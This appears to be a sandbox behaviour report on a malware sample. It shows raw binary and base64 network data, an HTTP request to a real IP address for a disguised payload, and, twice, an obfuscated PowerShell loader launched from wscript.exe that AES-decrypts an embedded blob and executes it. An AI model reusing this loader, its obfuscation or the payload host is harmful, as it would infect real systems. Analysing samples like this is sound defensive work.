Y‹Ð?¦1¢Äw©ÜzfqÞ]OoçœŠª¤–û^Ü*ò^ïœ$/¥PG¾Ï"À82í ÆàxÁ¨v,àsùa ÇpU?Ïë† 1^çŒä)æki[Øprij*‚ŽMàG¦bXØ¢Tà^Iݕl°SúeâÔ*FQ­¯€ÍÏå€3!R¥ékõÊ9gåGPß‘½$†?L$@;ÝÖãðÀ#ˆ ×“”Ô+Õ遡¹<²9Üzbš’$"œÑü6zá‰IH'«‰QCW‘€·–ý¿\j (ff³Í™J¾qcøU‹õȞDj#m7B}° ç’ »OE탒A°ìÇãP(¢õã¾SRQ=eÆ뽸 3‚¥µUƒì}±{e‰¡ÆL“4’?Aƒ¿†;($±¯Žhé'U,Òø¯2㘣rc†Q{¬Ñ&À«É­…Ö¼Æ Ù}ðO0Y-›wCí™Þh.ÜQfž‹SŒð¶£‚F² TiÊ°N@÷¼¦txÕ!÷r>•827¬nÚ¤þ¸„荪Z[ã€ç‚nŽi å6€'ž}±Ík£;’›•õþ™—¢‘à“ib 4<mßc+Úm üÎîÅ´»Pµn°®/Ud¾wnØY ;ŽHÚ«®.X¨ä| ?L›P«!™˜) ¹º
Data received oNé4Eý[™ú}/"–UiB.…qš0H =»à —ÒÄç¡ÄdXüó ¯s›wåÄ6ÑÝÑO5×15-ûíå*ܓØõ¬ CꐀAåAÛªÒ4|"ڞAQw’'GKr)¬°91*4ŠC³*؞ƒéï¦ŽB¥@ :œÌt-%y¨ÎHü-ó8»Ã¸ï\/Ÿl¢!-Á ÷#®4éµ<ç! §ÓÓ±K¶=’•ã¡÷ùáE6OÀtŊÚr¹Ñêl’”ÀÿLOÏ»XXk*@݀& ¤ŸÓ( ²T ;(e'ÛTÖð(B9æ¸îq& é'…º»^NJŊÿíœmkÔÅ#kš=Hm‘¬}ÖÀöö9ƒâ³$ž)©*hn ó WôÇ"Ô<þ4ºm1fà)BÀ)»æð¯ }<(ŚI嫺sß#Ëtœ0{F¥nÇá„IåŒ2£m ¥Xû‹¼1Óº0fF¢ n]¿¦ ؁GßÐ}žVm Ómì¥b¿hU›W§ ×oV[Â5E žqÛå6Û¯›~x/ÔG¬ÔÆÚvÞJ»«ßÛÐë¥*Y˜…oÅÛážìÐešr9ôçšçYéI—tg˜ÔÆÍ{}3'Á·é's"2«¨U¹ëÐV>?§ó`…õDhÿºë—Ðø¬káÛ¤<Ąô'uvÇ'–†E‘ÄjÊi wÀ¾§ŒñÂE†R¥KÅ|z¨>8Eq#»}âW êì7"—¿@ ö' ªñm‡Æ"$‘FÑÂEŽOn•™{<_ŐŒA¦kbE k²Iþ#wیwMöwM¦Ý;_¤m*£‘Û¾†ñV§Å|`•Š5%h(éCž¸tðu] Û§wâµ? 7jao´Q¼hZ(âò؅jR/ŒÓÒ7 >ïÅÈàŠÀÉðÍsG<Zi(Ò(…Û…´Î‘xV™$,ÑÌnoio§ÇÜXÆõz¾'¤ÔƆšd fÜ9ËÉ ûç„āNå…šç¦C¨•4é·O$ª–E`U¾?ë¦ Z'Õ¤JºIT¬­ª¿ž+¢ÖÍáÁ£‘”Âzýi¶²IÕŽpÜoHFøß$‡ÕC÷ˆ^êÊv/®bøS$Z©tÓU½-~ã=!Ú¶é õA½fèÊj£š+¹x5þ,|Líñ&š -)nŀÍMN¯ïXÚÞb±WW×ô¼(Ð+xYӅ;¶î'¾ìÏðM7+Ï(eUµ_‰=pâ~6£ÂãÓièI ËmàÌEÔø·‡ª’Ò€;0Üox†¥ô²Ã!¶'©ˆþ/†K­‹R±Àa•Ùš™Y‚‚zÝ°;Áõ¿í¤UY†Úx7š;䋱-† ê r»†aøPÒõôÙ<õÇVH÷‚|ÝÍé$¯}pñ m ꇒû¿å?/åžl+ǶzÝ_“÷A$åµ¶@£ñÏ<4ÚyTyz¤õ…MP¢6–ÀLmHürõ ¸Íс#xÜ·¤ ôIÿŠŽ,tӢܚi]6å5}:ôÀJU) êf¹®H rtõ$TèÄîPÛ}DX7\ã3h÷:²©=¸íðÁÜúv¤B ¶âOKÿÛˤB†>YBáŠú«pZ¯™ò­§Û®1¹+  ûÕúä¬ìeT1*R sÍ~xìPûÀΟS<ñ Ë¢)ªM:>íÅ6ž;] òðhI‚«2£­îe’hf»ùÓ34£{’o†$Ÿ×.¯;‰Jûˆõǐ03gðä%\ %€µ@Ù×Ë«ÑGFŠàÈT³]p@¾hœÑ}$Ž k¥Y®m¶r­#î¯M¿'nË´0*N˜"ۚëlôIáZ`¤ÏQÛ'„¤OÉPJÀÅX˜(‹ŒM¤x.ÛKf³~á£B€܋ÈÔΚ’© -Ž¤ŸéŠñ›×ÃT†Ú1ÙK Äck7è0:ˆŒ/d›=Ç| ˆˆm¬hŒºF­wéÀÓ,8,Y­¹ÅˁÈààp7Šn ¡†,dØ° ]V¨í{ãev¨r‡žý° 5Z£]§¥{ã£È‚2 nGlIõ6y]0é;³!ðÔÃ"N ·éŸ|ý#êg^'¦3"Ë4òªíb®¥‘TY9χ;3@I™H${çÜÿa:LŸe¼Bùjƒ#6ÌËêt¬ Ÿ³Ìx×Úh"Ö«8ð‰äžXÜÈ¡ÔD­ÔrÄî,G»gŠûU“íî›P$ É¢ Áƒ2"Q_Ä=Æk}„Ô>‹Æ>ÖF’Bѧƒjœy`úv•;A üæ'Û ö½9§ÑcÜ}Þ*ÀôŸµéäfû=æ$±Êš=’«"¨ µð9µsíŸ9Ó@A.%ÚÃáŸXý³Ë¦oð]>¦IP£‰]Ai h@ÿG>cs eèkë€IJ²y¥•…`ßFó85~•¾>9¤É¹v(ÕÜ\NsäV‘Ś⿶ô0Ÿ5œ’9µ D›ùeõ(ë!`êAï·§ë“íVpòËûd¹g`ÊðÜ¦‚ß¿LY5Ô¬€0*Á¨÷®r䓨`}[U«pXSðʕ¨Ž€ áO¿~>w³±L÷3f‘ˆïÞ±' GR$F6è×ˏʂB(5óàsŠ´Ú}.âΤ?j¿Ó=ÔI7=F> ju)§™vî_ázÂÆ] Ó±3)6¿ÃŠh¡wÔÉ2€JÞÐßßz¹e†c§@Ipþ™UüÎ7vWþ™£ŠEi$™H•½A˜p~½?<ZUt´’Яc]ý¹À«z”môç”i¶EÒÉøüòc0T—ÇõÉx݈R…‡Ã3¨Ê=+é=íšÂ8§A±±ÝGþœTi®EB¡y+ËFyà]à<-àõoV^ë^ùD’ˆn* ojkøyãj×`…aÉ°?KÌImee*Ìp=@“NÑZºpnÇC˜ž/ªMLÉd2D9#¹ÄÊŒ0Vç±ÉD`Ê >øtÚPn3zI’‘ÈU/Åíq/ÒIª›Í1ÜHoŸâ#§ë”œêËæBۙ‰$þ•ðÀىÑS|*¬_„öùf_ŒºTU sïˆÅ¨–(]¬ô'¶UUõ¼a¿ÌFÎêËA+ã”ç*;þðBUOB†V"Ûx&€Ã\ >Õy šÉV ªÌ Âé4èP™ÔHØ¥¶Úûáå],$C:²1³¸´Šã©X˜°}kŸÏðBé5Ë# „Ãëô-7›€>¬OI#Q@…«‘]Ž³Ü†eqm§ÒOaÛ:X›Rf+ê<Û®E¬óô±¥#ÒÀšçŽ0ïtÃg5\®,ÃÒ  £(ÄÆ¥ÄNƝ½O8Äp)f‘c`X[_|ã&ÑuÅPú±¤i”ù2 ÐÀ/ +‹Äõz8'‰Þ=0i[ãÊñí›ðÇhòyE·óÇÀâZùÖ6Ў¬ïM]vÀÊðzOÒÄís•,Oø}-ý³ÔÄÏ&Þf «N3Íxv­çñ^Tk$®ãӡ랋P®co,Ú²•ç¶`õ°O?—!jFnã<¶£W­Ñk 3; Vêz79½ Ñ˦å”5­ž˜—ŽFÓèؾÒêôºŒ /—ï'$€Ù`¼} Cƒ€Âuq…ócµ?ዏ£Ô«í”‚téÇèpòͧZe*tŠk°ûûàz´@‚´Ì<”Šg«¾B€?žkèáZ$0! º3Æk4말6žc"²°°Z瞞ÿ–z Ö𸠂ÙT*šê(`k–Ž6ó  Öyn •àô#2ćV¦:¢y+Ќj*D±žJûà^}Š¦ö‘úå|ðË´4=²²Dò+X,Ó¹Û\hóÛ! ÉïX%]Š¾ÖÛÎÞøwfÏ˜…€7¶ dGÔ‚E`;,HHmÀ°Ð¢éÐ$gŽ¤b±j60›»YÊÉ)V,­Éè0 šj¢s‘?˜¬¤²Ð>ªF&g1£<Š£o7Šh|Tjõn¡X“Òÿ±qæ†ã5&@Q˜¦F­¥haG;¾”8âûÖîŠ@åwWí™rAsY‚•6lñ9‘bWâהy·FCB¬¦ç¤rÂ5ÖìôÅÙämÌ ڝóA"D&*Uk¶(5-TzZ·e²Çà0 ©”E©DgO8êê)Fµü@âz½:NêÒ*µÍåà]LƏ¥Œ ¶Õ Óùˆ¡V¿,̖hæõROÇñ-Ttè«Iïyåšyã S×½à{-<¨X¡u ß ©›JQYB©â½ý³Å˪Õî#²šà‘W„ƒW®PŒ7:n¾—x”¼À²3+ÁÓ‰Ïm*Wp¡×3“ÄcÕ@T¨B8`xÝC DèÚè+“Ÿ3mþ-×YÒ¢39F`EqÐa”E³Í¬HãžqiõκcGÇK®¸Óé!*)Ë1^—Ó;îñFÌfpXñ·©ã1ô/2ÌÌeeÕwÍq§C¹÷Ì8³€)J xÇ+ÈÆ¢˜jt¤–]Ê9ß-Üü×O|qÇr§#ßsV.:žK¥ÆA°G_Ž7©xÖ1B½Ž'$„ŽäÎdþÏ q#+õäprÐ#n )ÚÉØ÷ç65–0-Ÿo|ó³I¬ièFmOZã\ÞÀ(UØÂÀ걎ù•çë(€ƒÁ®Øp¥œçËÿÀvi”²Ž¥±v”=ÒØ “"5 $Wc‹¨tšG“˜Çá8 %±(÷Ç¡®Ià.yÝh&gŽR©´<Þ-$B›UØ­“}û`hj5 ¢Œ¼´IáW¹9•ŸSãR6¦VÙûØÜüØ5Ú§¦°Tï=.—í/ˆˆöE«R;U•‡M
Data received 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
Data sent GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 198.46.176.133
Time & API Arguments Status Return Repeated

send

 buffer: GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
socket: 1312
sent: 79
1 79 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
parent_process wscript.exe martian_process powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe